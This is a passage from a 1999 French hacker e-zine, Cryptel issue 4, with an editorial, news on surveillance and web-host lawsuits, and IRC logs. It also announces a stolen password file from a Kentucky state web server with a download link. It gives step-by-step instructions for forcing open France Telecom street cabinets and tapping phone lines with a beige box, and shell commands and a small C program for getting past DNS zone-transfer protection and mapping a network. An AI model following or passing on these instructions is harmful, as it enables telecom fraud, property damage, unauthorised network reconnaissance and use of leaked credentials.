Copy Link
Add to Bookmark
Report
Cryptel Issue 04
__ __
_ _______________ _________/ |_ ____ | |
_| |_ _/ ___\_ __ \ | < __ \ __/ __ \| |
(_ __) \ \___| | \/\___ \ __/| |\ ___/| |
___| | \___ >__| / ____|\ \ |__| \_____> |
(_____/ \/ \/ \_/ \/
_
(_)
______ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
(__ __) (_D_a_) (_F_r_e_n_c_h_) (_T_o_u_c_h_)
/ /
/ /___
(______) EDITION No 4 _ MAI 1999 _ CRYPTEL Inc.
> staff____/\ vatoo [vatoo@caramail.com] (editeur)
\ aaah [Aaah@mail.dotcom.fr]
\ cyberjunk [Snipper@hotmail.com]
\ drahiin
\ dafalgan [dafalgan@caramail.com]
\__ _ _
________________
>> Avertissement:
L' organisation CRYPTEL a écrit ce texte dans
le but UNIQUE d'informer les gens. Ces quelques lignes
codées par des 1 et des 0 ne sont donc qu' à prendre d' un
point de vue éducatif. Ce texte n' est pas illégal, c' est
son application qui l' est, alors soyez sérieux, ne le
mettez pas en pratique, car vous pourriez être poursuivis en
justice et nous ne serions pas responsables de vos actes. L'
information n'a jamais tué personne. Les actes, si.
______________
4.1>>Editorial:
Fabien alias Faker, est mort le week-end du 8 mai sa vie se termina
donc à l'age de 20 ans dans un accident de la route, n'est ce pas beaucoup
trop jeune pour mourrir ?
Fabien était un gars bien, et pour moi un ami sincère, honnête et généreux,
comme on en rencontre rarement .
Il avait des projets pleins la tête ...
Cette subite perte nous a tous attristé. Et nous souhaitons nos plus sincère
condoléances à sa famille .
Fabien ( le connaissant ) aurait aimé ce magasine, et comme a son habitude
l'aurait imprimé pour le lire comme on lit un livre passionnant .
La cryptel team et moi dédions donc la 4eme édition du magasine Cryptel, à toi
notre ami Faker .
Je garderai et nous garderons toujours un bon souvenir de toi .
R4
__________
>>Sommaire:
_________ ________ ____
/ article \_______________________/ auteur \_____/ Ko \___
|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
| 4.1 Edito Vatoo 2 |
| 4.2 Actualités Drahiin/Aaah 10 |
| 4.3 Password File Aaah 16 |
| 4.4 Ouvrir un répartiteur Jibus 7 |
| 4.5 AxFR - Bypass Un ami 13 |
| 4.6 Emetteur T.V. Dafalgan 48 |
| 4.7 TEMPEST (compr. elect.) Vatoo 78 |
| 4.8 Trashing Reports Aaah 18 |
| 4.9 Scan Bourse de Paris Aaah 6 |
| 4.10 Les Nymservers Drahiin 23 |
| 4.11 Gentil Virus Anonyme 15 |
| 4.12 NT - Ultime Guide Shenlun/Cyb. 79 |
| 4.13 Nos amis les feux tricolores Vatoo 180 |
| 4.14 Win Proxy Aaah 9 |
| 4.15 Média Underground Aaah 7 |
| 4.16 X-window Cyberjunk 12 |
| 4.17 Ze End Vatoo 2 |
|__________________________________________________________|
'¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯'
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Actualites ) 4.2 ( Drahiin/Aaah (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Surveillance
Pentium II, Pentium III, Shockwave, Windows 98... voilà les noms des dernières
taupes en matière de surveillance informatique. Alors que les médias décriaient
l'arrivée d'une vague de trojans, Back Orifice en tête, ce sont maintenant les
entreprises que s'en donnent à coeur joie, et se lancent dans la mise en place
de taupes informatiques. Les mobiles sont variés et vont de l'utilisation à
de pures fins statistiques (Macromédia) jusqu'à la lutte contre le piratage
(Microsoft). Cependant, que dire du système mis en Place par Intel ? Il s'agit
de véritables numéros d'identité informatique. Certes des moyens existent pour
éviter ce genre de surveillance, mais ils ne sont sûrement pas à la portée
du premier venu, quand bien même celui-ci connaît l'existence du problème. Bref,
ils s'agit de nouveaux moyens pour connaître l'activité des personnes
sur Internet, et ces méthodes, fortes de la position des entreprises
dans l'opinion publique, se répandent sans réellement rencontrer de résistance.
Est-ce qu'on ne se rapproche pas, la encore, un peu plus de l'ère de Big Brother
?
Internet s'ouvre au public, Internet se ferme à la liberté.
A propos du réseau des réseaux, nous savions qu'il avait tout d'abord été créé
à des fin militaires, puis utilisé dans le domaine universitaire pour la recherche.
Plus récemment, c'est l'invasion par le monde commercial qui a été le plus flagrant,
bannières publicitaires à l'appui. Actuellement, on entend souvent dire qu'Internet
se "démocratise" (on ne peut pourtant pas dire que tout le monde puisse se payer
un accès). Paradoxalement, avec cette ouverture au public on voit apparaître
des actions juridiques sans antécédent. Elles prennent souvent une tournure
répressive, comme nous l'ont montrés l'événement concernant le-village, et celui
plus connu concernant altern.org. En effet, alors qu'au cours du plan vigipirate
en 1995, la fermeture de BBS se faisait dans l'ombre, à l'abris des regards,
la fermeture d'hébergeur à lieu aujourd'hui, sans complexe, au vu et au su de
tous.
On reste dans le domaine commercial quand Estelle Haliday décide d'attaquer
en justice altern.org. Attaque qui n'a d'autre but que de protéger son image
commerciale (ou l'image de son commerce). Mais, peut-être est-ce aussi que l'idée
du "gratuit" sur altern.org la dérange. Cependant la plupart des personnes connaissent
les faits, ils sont d'ailleurs relatés en profondeur sur le site altern.org/defense.
Même si ce cas est pour le moins gênant, (altern ayant d'ailleurs fait l'objet
d'autres attaques juridiques), c'est l'état d'esprit évoqué par cet événement
qui est le plus à déplorer. Malheureusement, la vision des choses d'Estelle
Halliday est loin d'être unique, et connaît un écho dans l'opinion publique.
Si des personnes ont pris ouvertement la défense d'altern, les autres se taisent
et trouvent, pour la plupart, "normale" cette prétendue défense de l'individu.
Est-ce normal de privilégier la bonne image commerciale d'une personne (qui
ne risque d'ailleurs pas de s'en retrouver à la rue), par rapport à la libre
expression produite par plus de 40000 sites ? Est-ce normal de condamner un
intermédiaire technique, pour un contenu ou des propos tenus par quelqu'un d'autre
?
Enfin si des personnes se sont exprimées sur ce domaine, on ne peut pas dire
qu'elles étaient nombreuses. Nous n'étions qu'un cinquantaine pour soutenir
altern, lors de la manifestation du 20 mars pendant la Fête de l'Internet. Ou
étaient donc passés les plusieurs milliers de personnes qui avaient signé la
pétition sur internet ?
Quoi qu'il en soit, les politiques, eux ont trouvé comme à leur habitude une
occasion pour prendre la parole. Le gouvernement est indécis, et pense qu'il
faut y réfléchir. L'opposition quand à elle, est contre le gouvernement. (Si
les choses changent sur le net, apparemment rien n'a changé en politique). En
clair, cette affaire a été pour les partis politique une occasion supplémentaire
de parler en public. S'exprimer ? Non. Parler. Enfin, il est rare qu'autant
de déclarations publiques soient faites à propos du réseau, cela montre au moins
que le sujet n'est pas innocent pour l'opinion commune. On remarque au passage,
l'intérêt du parlement européen pour le côté juridique du problème, certainement
pour le cas ou la situation devrait se reproduire.
Finalement, que ceux qui pensent qu'une pétition sur Internet ou une manifestation
de 50 personnes ne sert à rien se détrompent. Peu avant la parution de ce numéro
de Cryptel, on apprend que Estelle Halliday a revue son ambition à la
baisse (avec deux 's' svp ;) et qu'elle ne réclame "plus que" 70000 francs au
lieu de 405000. C'est encore trop, bien sur. Mais cela montre que faire pression
n'est pas inutile dans une telle situation, loin de là.
A propos des autres procès, la RATP a retiré sa plainte, et l'accusation juridique
concernant le site de la CNT semble pouvoir bien se terminer. Valentin Lacambre
annonce une réouverture possible d'altern.org début mai. Peut-être la liberté
d'expression aura-t-elle en partie survécue, pour cette fois.
Drahiin.
Sur #cryptel il y a une série d'indésirable. En voici un il s'appelle Lunacker il
s'est fait kick/ban 3 fois. Trois fois il est venu nous dire ce qu'il avait sur le
coeur
Session Start: Fri Apr 02 19:36:11 1999
Session Ident: Lunacker (~er@tntcfd9-58.abo.wanadoo.fr)
<Lunacker> ca te fais rire ptit con !!
<Lunacker> t'es aussi facho que milosevich !!!!!!!!
<Lunacker> ca fait peur !!! Pauvre France !!
Session Close: Fri Apr 02 20:10:39 1999
Mon dieu mon dieu mon dieu le pauvre petit ne devait plus avoir toute sa tête
on le pardonne. 10 jours apres rebellote
Session Start: Mon Apr 12 21:27:33 1999
Session Ident: Lunacker (~er@tntcfd8-228.abo.wanadoo.fr)
<Lunacker> vive la démocratie !!!!!!
<Lunacker> vive les copieurs !!!!!
<Lunacker> garde le ton putain de chan !!!!!!
<Aaah> autre chose ?
<Lunacker> non j'ai pas envie de ma fatiguer plus pour un con
<Aaah> bonne soirée
<Lunacker> merci a toi aussi et bon copiage
Les copieurs c'est une référence a www.phong.com à ce propos inutile de nous le
sortir comme argument perso on sent fout mais alors grave, on laisse couler avec
un kick/ban. Une pensée chaleureuse de pitié va vers la team de hack.fr avec
Snowcrash et ces sbyres. 22 jours apres on prend le meme et on recommence
Session Start: Tue May 04 20:24:38 1999
Session Ident: lunacker (~er@tntcfd8-52.abo.wanadoo.fr)
<lunacker> mdr !!!! tjs aussi bete a ce que je vois !!!!
<lunacker> qd on est con, on est con le tps ne fait rien a l'affaire (G-Brassens)
<lunacker> SUCK les FACHOS !!!
Session Close: Tue May 04 22:15:45 1999
Decidément il y tient ... Enfin bref apres les ptits logs private voici les
logs du chan. Voici Tiji qui doit surement rever de faire son interessant et
nous sort le bobard du mois
<TiJi> j'ai téléphoné aux renseignement telephonique et j'ai demander l'adresse
du numero de tel auquel on telephone pour se connecter !
<TiJi> ensuit j'y ai été pour y mettre une black boxe !
<Aaah> bon c quoi ce soir
<Aaah> 3615 mytho ?
<TiJi> sans dec !
<TiJi> sauf que je me suis fait pincer !
<TiJi> .... 1 moi de prison pour deli mineur !
<Aaah> moi j'ai crée une antenne chuis allez sur la tour effeil et j'ai foutu
un satellite
<rockme> aaah : pt de rire =)))))))))))))
<drahiin> aaah: nan toi aussi ??
<Aaah> ben voyons
<TooN> je suis le seul a avoir hacke le repondeur de ma grand-mère alors pouete pouet
<MufUm> arf
<TiJi> ;)))
<drahiin> aaah: on a failli se croiser alors..
*** squal has joined #cryptel
<TiJi> mais c même poa marrant.. 1 moi de taul c Chiant !
<squal> lut all
<rockme> bof moi le seul truc qu'on peut me reprocher c d'etre rentrer avec le
fone sur un truc qui gérait le chauffage d'une maison
<drahiin> squal, hello
<TiJi> c putainement chiant !
<TiJi> surtout ke c marquer sur ton dossier !
<rockme> et que quand les occupants sont rentré y a du avoir des blems de températures
<TooN> lu squal
*** TiJi was kicked by Aaah (ok on lui dira)
Et pour finir un extrait de social qui nous montre bien que certaines personnes
sont crédule mais alors quelque chose de grave :)
<k0lp> coder_: tu fais oka avec une merde pareille
<coder_> kolp : j'avais teste ca aujourd'hui
<k0lp> coder_: tape xhost +
<Aaah> coder fait pas ça
<drahiin> arf ;)
<Aaah> ça ouvre ton samba a n'importe qui :)
*** NickyLaw has joined #cryptel
<k0lp> coder_: tu fais ca et tu change tes mots de passes apres
<NickyLaw> lut
<k0lp> coder_: c pour toi
<Aaah> ahahaha
<NickyLaw> lut Aaah
<k0lp> coder_: c un conseil d amis tu noteras ke je t ai prevenu
<k0lp> coder_ fais ce ke je te dis
<coder_> ouais
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Password file ) 4.3 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Connecting to 162.114.197.36
Login : Kentucky Website
Password file : www.state.ky.us
User logged in, Transfer complete
Fichier dispo sur http://www.citeweb.net/crypte/ezine4/state.ky.us.txt
bien que cette rubrique soit assez controversée elle est maintenue jusqu'à
nouvel ordre. Un ptit coucou à l'admin du serveur qui fume (volontairement?)
sur les versions de sa plateforme :
Digital UNIX Version 5.60 puis Digital UNIX Version 4.0 faudrait savoir
Voila si vous avez des contributions je suis preneur. Petit coucou à la team,
à mon poisson rouge, à mon chat qui est entrain de bouffer le cable courant
de mes hauts parleurs (si il prend du jus va le sentir passé 230V) et pour
finir a Phil-31 qui fait du tres bon boulot pour nous assurer des bots sur
#cryptel. Aaah
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Password file ) 4.4 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Une visite au royaumme des fils
OU
Comment ouvrir les répartiteurs F.T.
And Beige Box en Z.I.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-
JiBuS / m4st3r_doshwau@hotmail.com
junk / snipper@hotmail.com
23/03/99
Best UrlS:
cryptel.cjb.net
members.xoom.com/nevroze
1. Disclaimer
Ist PART
2. Comment reconnaitre un Répartiteur ?
3. Marche à suivre pour l'ouverture =)
4. Fermeture de la big box
IInd PART
5. Beige Box en Z.I.
6. Interêt de la manip, conclusion and greetz =)
* France Télécom ne reconniat pas le piratage selon le contrat que vous
avez signez pour l'ouverture de la ligne. Alors Nikons les entreprises,
et laissez les particulier tranquille =) *
Aller hop, Sac à dos, Téléphone / pince croco, pied de biche, lampe ?
OK c'est parti ... :)
<M45tr3 JiBuS> Tout s'ouvre !
<junk> si si ...
<lamer phreaker> Tous sauf les répartiteur !
<M45tr3 JiBuS + junk en coeur> Mais bien sur =)
1. Disclaimer:
==============
Attention !!! Ce texte ne vous incite pas a aller ouvrir les répartiteurs
. Il vous expose juste une petite thérorie a ce propos. Toute ressemblence
avec des faits réels n'est que
pure coincidence ... Vous êtes responsable de vos actes, et ceci
est vraiment une solucerapide pour terminer au poste =)
Alors soyez prudent ...
2. Comment reconnaitre un Répartiteur ?
=======================================
C'est assez simple, le répartiteur est le boitier le plus gros
disposé en ville par FT.
Large de un peu moi de 50cm, et de hauteur variable, fréquement 1 métre
et demi...
Il affiche le logo de FT ou des PTT selon sa vieillesse en haut à
gauche générallement, sur une plaque en métal.
Bon vous l'avez reconnu =) Faut pas que ca devienne une obsession, mais
c'est vrai qu'il y en a baucoup =)
Ces armoires métalliques peintes d'une couleur grise si degeu
appartenant a notre amie l'enc**** de FT sont a priori difficiles ouvrir:
- grosse ferraille, taille imposante, double serrure etc...
+ Premiere idée: il nous faudrait une meule !... a bannir: bruit, jus,
destruction non réversible rapidement et pas très discret de toute façon
(Cela reste un facteur essentiel).
+ Seconde idée qui marche très bien, discrete, révesible si y'a pas eu
de déterioration
Matériel nécéssaire: juste une barre d'environ 30-40 cm de long, en
acier qui passe dans l'anneau métallique de la grande boite (un pied-de-biche
fait très bien l'affaire et peut servir à ouvrir d'autres trucs...
ie: Voiture ;)
3. Marche à suivre pour l'ouverture:
====================================
_____________
| | |
| PTT <---------------Plaque métallique, FT ou PTT
| | |
| | |
| | |
| o <----------- Anneau
| | X <---------Serrure
| | |
-------------------
Photo numérique d'un répartiteur =)
a) Passer la barre dans l'espèce de poignée (anneau métallique)
b) Touner cette poignée comme si on voulait fermer cette boite
(ne pas essayer de l'ouvrir comme on ouvre une porte, ça ne peut pas
fonctionner et ça casse la poignée, faudrait trouver une autre boite
tranquille...).
Il y a 1/2 tours facile et le reste en forcant.
c) Tourner jusqu'a ce que le haut de la porte sur la quelle est la
poignée s'entre-ouvre.
Attention a ne pas casser cet anneau, ça coupe (et je ne me suis pas
raté -jibus ;) Voilà, le haut est entre-ouvert, c pas la peine de
forcer sur la poignée, le bas ne s'ouvrira pas de cette façon!
d) Ayant une main (la droite pour moi) dans l'ouverture du haut,
l'autre en appui sur l'autre porte, un pied (le gauche pour moi) à
retenir le bas de la porte lors de l'ouverture, l'autre par-terre,
tirer fort en haut, ça tord la porte et le bas se dégage gentillement,
sans bruit puisque le pied la retient.
e) Maintenant, c tout vert!!! bonne visite au royaume des fils ! ! !
4. Fermeture de la big box:
===========================
Pour refermer, il vous faut rapporter la porte en position de
fermeture, un bout de ferraille gene, c'est le même qu'a l'ouverture,
meme remède: "pied, main et main", on tire fort et haut, le bas se lève,
on pousse avec le pied et on relache lentement la traction de la porte.
maintenant, on enlève tt ce qui nous appartient (Main + Doigts) et on
s'en va... =)
5. Beige Box en Z.I.
====================
En allant ramener ma copine chez elle, je fais demi-tour et mes phares
éclaire un étrange petit boitier qui était passer inapercue jusqu'a
aujourd'hui a nos aux yeux de phreaker =) Une simple
et petite borne portant l'insigne France Telecom. D'une hauteur de
50 Cm, et en plastique cette petite installation doit comporter a peu
prés une 15zaine de lignes.
Pour l'ouvrir rien de bien compliquer, un tournevis, des doigts et un
peu d'imagination. Pas besoin de s'attarder sur cet partie, de toute
façon vous n'aurez aucun mal a l'ouvrir.
Pourquoi beige box en Z.I. ?
Bin en fait c'est simple =) Ces petites bornes poussent dans tous les
sens dans les zones indus =) Nous en fumes ;) trés et agréablement
surpris je dois dire.
Pour notre premier essai, nous avons choisi une station de lavage de
caisse. A 2 Heures du mat, ca y'est l'équipe est reunit on ouvre. =)
Tiens, une colone verticale au milieu de la borne et les fils sont
ranger par paire sur le bornier. Bien plus facile qu'une cabine !
On branche les pince crocos.
*mmmh* J'entend un LA. =) Petit test de numérotation, Oui c'est bon...
On à la ligne...
6. Interêt de la manip, conclusion and greetz =)
================================================
Bon ce qui est vraiment tranquille, je vous le cache pas c'est
d'avoir un portable + modem.
Le hack devient carement anonyme, le minitel devient netement moins
cher etc ... =)
Ne déconnez pas, ne le faite pas dans un quartier résidentiel,
franchement en ZI ca passe peinard ;)
<SPECIAL GREETS A LA SOIREE PHREAK: bob,jibus,junk,neo,va2 et
à la tekilla Sun Rise>
M45tr3 JiBuS et Junk, France Telecom ON t'ENCULE =)
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) AXFR- Bypass ) 4.5 ( Un ami (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
How to fuck up da AXFR who say the lame message Query Refused
==============================================================
================================
DISC OF DA LAMER
================================
Ce texte est fait uniquement pour démontrer les problèmes de sécurités
présents sur les serveurs DNS ainsi que ( si possible ) une manière d'y
remèdier, l'auteur NE POURRA ETRE EN AUCUN CAS tenu responsable d'une
quelconque utilisation de ces procédés de démonstrations a des fins
crapuleuses . Pour plus d'informations je vous laisse donc vous reporter aux
code pénal article 323-1 323-2 323-3 323-4 et 323-5 .
Il est aussi à noter que l'auteur ne peut être tenu responsable du contenu
de ce document du fait que des informations ont pu être ajoutés ou retirés .
Merci d'en tenir compte .
Il est privé et donc ne concerne que l'auteur et son
destinataire donc si vous n'êtes pas autorisé à lire ce texte pour une
quelconque raison ne le lisez pas !
Si vous n'êtes pas d'accord avec ces terms ne continuer pas la lecture de ce
document .
/***************************************************************************/
Salut tous =)
L'utilisation des techniques présentés ici demande quelques petites
connaissances du protocol DNS pour cela je vous laisse vous reporter aux
excellents RFC ou DNS-Howto qui expliquent trés bien ce que sont les caches,
les entrées, les reverses les zones in-addr.arpa ...
Donc avant de commencer à lire ce texte si vous ne comprennez pas les
quelques mots précédents et bien j'utiliserai la célèbre réplique
Read The Fine Manuel . =)
bon déja un AXFR c'est koi ?
============================
Un domain ( exemple security-bogus.com ) est composé de différente entrées
dans son fichier de configuration,
exemple : IN A ; IN MX; IN CNAME; IN NS ; IN HINFO <-- plus rare ...
Donc si l' on peut récupérer ces informations, on peut aussi récupérer pleins
d'informations intéréssante sur le réseau par exemple les noms + adresses ip
des machinnes, les servers de mail contenant les utilisateurs, les serveurs
DNS , et même parfois des informations sur les machinnes installés (HINFO).
Bon voila comment normallement on fait une requete AXFR sur un domain
( exemple security-bogus.com )
[nobody@security-bogus /]$ host -l security-bogus.com
security-bogus.com name server ns1.security-bogus.com
security-bogus.com name server ns2.security-bogus.com
security-bogus.com has address 127.0.0.1
linux.security-bogus.com has address 192.168.1.2
mail.security-bogus.com has address 192.168.1.3
ns1.security-bogus.com has address 192.168.1.5
ns2.security-bogus.com has address 192.168.1.7
grosse-pomme.security-bogus.com has address 192.168.1.1
Ce que je vien de faire va générer le message suivant dans les logs du
server :
Apr 29 20:07:54 security-bogus.com named[1407]: approved AXFR from [127.0.0.1].9611
for "security-bogus.com"
Là on voit que tout passe niquel ... On peut meme downloader la conf :
[nobody@security-bogus /]$ host -l -v -t any security-bogus.com
rcode = 0 (Success), ancount=1
Found 1 addresses for ns1.security-bogus.com
Trying 127.0.0.1
security-bogus.com 86400 IN SOA ns1.security-bogus.com
root.localhost(
1997022700 ;serial (version)
28800 ;refresh period
14400 ;retry refresh this often
3600000 ;expiration period
86400 ;minimum TTL
)
security-bogus.com 86400 IN NS ns1.security-bogus.com
security-bogus.com 86400 IN NS ns2.security-bogus.com
security-bogus.com 86400 IN A 127.0.0.1
security-bogus.com 86400 IN MX 1 mail.security-bogus.com
linux.security-bogus.com 86400 IN A 192.168.1.2
mail.security-bogus.com 86400 IN A 192.168.1.3
ns1.security-bogus.com 86400 IN A 192.168.1.5
ns1.security-bogus.com 86400 IN HINFO Pentium 200
ns2.security-bogus.com 86400 IN A 192.168.1.7
grosse-pomme.security-bogus.com 86400 IN A 192.168.1.1
grosse-pomme.security-bogus.com 86400 IN HINFO CISCO IOS
security-bogus.com 86400 IN SOA ns1.security-bogus.com root.localhost(
1997022700 ;serial (version)
28800 ;refresh period
14400 ;retry refresh this often
3600000 ;expiration period
86400 ;minimum TTL
)
( On peut noter qu'en réalité le DNS file n'est pas aussi complexe mais que
lorsqu'on le recupère via un AXFR il le devient ... )
Voila la on a le fichier config avec quelques infos MAIL (MX) DNS ( NS )
Informations ( HINFO )
PS : on aurait pu obtenir ces derniere infos avec :
host -t mx security-bogus.com ( pour avoir les mails servers )
host -t A security-bogus.com ( pour avoir les entrées standarts )
host -t ns security-bogus.com ( pour avoir les dns servers )
etc ...
Approfondissons le mécanisme avant de passer au Secure DNS Bypassing =)
Bon pour ceux qui ont lu le DNS howto & co j'explique, ils comprendront :
au moment où le server de nom primaire ( ns1 ) est démarré, il copie les
informations sur les entrés ( A; NS; MX ... ) vers ( ns2 , le secondaire )
via ce que l'on appel un transfert de zone ...
Donc si on suit mon raisonnemment, les informations de zone ( A, NS, MX,
HINFO ...) sont aussi consultables depuis le NS2
===================================================
Passons a l'attaque !
===================================================
Bon maintenant imaginons que l'AXFR soit refusé sur security-bogus.com
[nobody@security-bogus /]$ host -l security-bogus.com
Server failed: Query refused <-- This is da fucking Query Refused !
[nobody@security-bogus /]$
Quoi !@!@!@! ? C'est à moi qu'il m'exprime lui !@!@! =)
Regardons de plus prés ...
Bon ce genre de messager signifie que le DNS était protégé contre les AXFR
Mais si on regarde d eplus prés, on voit que certainnes requêtes sont
toujours autorisés ! Et oui, les entrées NS et MX sont toujours lisibles !
Car sans elle le DNS ne pourrait meme pas convertir les hosts de
security-bogus.com en IP ou encore permettre la réception de mail .
allé prtit test =)
[nobody@security-bogus /]$ host -t ns security-bogus.com
security-bogus.com name server ns1.security-bogus.com
security-bogus.com name server ns2.security-bogus.com
[nobody@security-bogus /]$
La on voit que les deux servers de DNS sont ns1.security-bogus.com et
ns2.security-bogus.com alors on va faire le petit truc magique ...
[nobody@security-bogus /]$ host ns1.security-bogus.com
ns1.security-bogus.com has address 192.168.1.5
[nobody@security-bogus /]$
[nobody@security-bogus /]$ host ns2.security-bogus.com
ns1.security-bogus.com has address 192.168.1.7
[nobody@security-bogus /]$
Bon désormé on a les IP des deux DNS alors c'est la que sa se joue :
echo " " > /etc/resolv.conf ( on enleve sa propre conf DNS )
echo " " >> /etc/resolv.conf
echo "nameserver 192.168.1.5" >> /etc/resolv.conf
echo " " >> /etc/resolv.conf
voila et là on essaye =)
[nobody@security-bogus /]$ host -l security-bogus.com
Server failed: Query refused
[nobody@security-bogus /]$
Grrr sa marche pas !
Bon alors on essaye le DNS suivant :
echo " " > /etc/resolv.conf
echo " " >> /etc/resolv.conf
echo "nameserver 192.168.1.7" >> /etc/resolv.conf
echo " " >> /etc/resolv.conf
Vla et la on retest
[nobody@security-bogus /]$ host -l security-bogus.com
security-bogus.com name server ns1.security-bogus.com
security-bogus.com name server ns2.security-bogus.com
security-bogus.com has address 127.0.0.1
linux.security-bogus.com has address 192.168.1.2
mail.security-bogus.com has address 192.168.1.3
ns1.security-bogus.com has address 192.168.1.5
ns2.security-bogus.com has address 192.168.1.7
grosse-pomme.security-bogus.com has address 192.168.1.1
Et voila comment j'ai fait fait pour bypasser la protection contre les AXFR,
j'ai juste utilisé le DNS secondaire, non protégé contre la lecture pour
lire les infos prises sur le premier .
Bon ce que j'ai expliqué ne marche pas ?
============================================
Attaque n°2
============================================
Un DNS bien configuré par un bon administrateur gère les reverses c a dire
qu'une adresse IP pointe vers un nom par exemple si j'essaye de résoudre
192.168.1.7 sa me pointe vers ns2.security-bogus.com ( en rélité il ne regarde
pas le reverse de 192.168.1.7 mais plutot le PTR c'est a dire l'entrée :
7.1.168.192.in-addr.arpa IN PTR ns2.security-bogus.com. )
Bon revenons dans le cas où même aprés la première attaque : toujours rien
[nobody@security-bogus /]$ host -l security-bogus.com
Server failed: Query refused
[nobody@security-bogus /]$
[nobody@security-bogus /]$ host -t ns security-bogus.com
security-bogus.com name server ns1.security-bogus.com
security-bogus.com name server ns2.security-bogus.com
[nobody@security-bogus /]$
[nobody@security-bogus named]$ host -t mx security-bogus.com
security-bogus.com mail is handled (pri=1) by mail.security-bogus.com
[nobody@security-bogus named]$
Bon là, malgrés que l'on ne puisse pas faire de AXFR on a déja 3 hosts regardons
leurs IP :
[nobody@security-bogus named]$ host ns1.security-bogus.com
ns1.security-bogus.com has address 192.168.1.5
[nobody@security-bogus named]$
[nobody@security-bogus named]$ host ns2.security-bogus.com
ns1.security-bogus.com has address 192.168.1.7
[nobody@security-bogus named]$
[nobody@security-bogus named]$ host mail.security-bogus.com
mail.security-bogus.com has address 192.168.1.3
[nobody@security-bogus named]$
Hehe, vous remarquez la même chose que moi, ?, et oui aparement, tout le
réseau security-bogus.com est sur la classe d'IP 192.168.1.X
Sinon vous pouvez aussi vous aidez d'un whois sur le RIPE ou sur l' ARIN
pour connaitre les classes d'ip exactes du réseau attaqué .
Bon bha là, la solution c'est d'essayer d'avoir le reverse de chaques IP du
réseau .
Pour, vous éviter de faire: host 192.168.1.1; host 192.168.1.2;
host 192.168.1.3 ( jusqu'a 255 ). J'ai fait un petit prog qui génère des suites
d'adresses IP .
/* ---------------------------------- CUT HERE ------------------------ */
main(int argc, char *argv[]){
int i;
if(argc != 2){
printf("Usage : %s 192.168.1.\n", argv[0]);
exit(0);
}
for(i = 1; i < 255+1; i++){
printf("%s%d\n", argv[1], i);
}
}
/*---------------------------------- CUT HERE --------------------------- */
Bon une fois compilé on fait :
./c-ip 192.168.1. | awk '{ print "host " $1}' >> exec-ce-check
host -t ns security-bogus.com >> exec-ce-log
host -t mx security-bogus.com >> exec-ce-log
sh ./exec-ce-check >> exec-ce-log
Et voila, now vous avez récu une partie de la configuration, c'est déja pas
mal !
---------------------------------------------------------------------------
Les solutions a ces differents problemes :
- Si on protège un NS primaire contre es AXFR, il faut aussi
protéger les secondaires ...
- Utilisé BIND 8.1.X et oui de nouvelle fonctionnalités sont venus s'ajouter
par exemple le fait de pouvoir autorisé certains hotes seulement a faire
des transferts de zones .
- Virer le cache ( si possible ) des NS servant de primaire ou de
secondaires à un domaine .
- Lire les howtos concernant la sécurité de DNS =)
---------------------------------------------------------------------------
J'espère vous avoir un peu éclairé sur ce qu'est le Secure DNS bypassing =)
Voila
La scène doit vivre, non pas avec des passionnées du dimanche mais avec ceux
qui veulent tout comprendre qui passe des journées a babasser pour faire
ceci ou cela . Et j'espère que la scène vivra et que des générations
prendront le relais .
Autre chose, oui toi jeune Jedy, n'oublis pas les bases de l'âme du hacker ...
Tu ne voleras point, tu ne détruiras point.
Et tu ne t'attaqueras pas a des sites aux quels tu n'es VRAIMENT pas autorisé, en
particulier tout ce qui concerne le gouvernement ...
Greetings To :
<->-<->-<->-<->
- Moi même =)
- BugBuster ( ph34r d4 31337 h4x0r p0w4|-| ) , Next ( phear ), The Cryptel Team,
Aaah, va2, Cyber, Tequilla ( phear =) ), drahiin et tout ceux que j'oublis et,
évidement, vous les lecteurs.
- Tous ceux qui m'ont éclairé quand je me noyais dans mes débuts,
- aux DNS howto et aux howtos en général
- UNIX Administrateur Système SECRET D'EXEPERTS
- Practical Unix and Internet Security
- Chevaliers d'Internet et pirates informatiques ( non non je déconne ) =)
----------------------------------------------------------------------r4-------
( tant mieux pour ceux qui comprendront, tampis pour les autres )
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Emetteur TV ) 4.6 ( dafalgan (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Un émetteur TV
par dafalgan : dafalgan500@caramail.com
Avertissement :
L' organisation CRYPTEL a écrit ce texte dans le but UNIQUE d' informer
les gens. Ces quelques lignes codées par des 1 et des 0 ne sont donc qu'
à prendre d' un point de vue éducatif. Ce texte n' est pas illégal, c' est
son application qui l' est, alors soyez sérieux, ne le mettez pas en
pratique, car vous pourriez être poursuivis en justice et nous ne serions
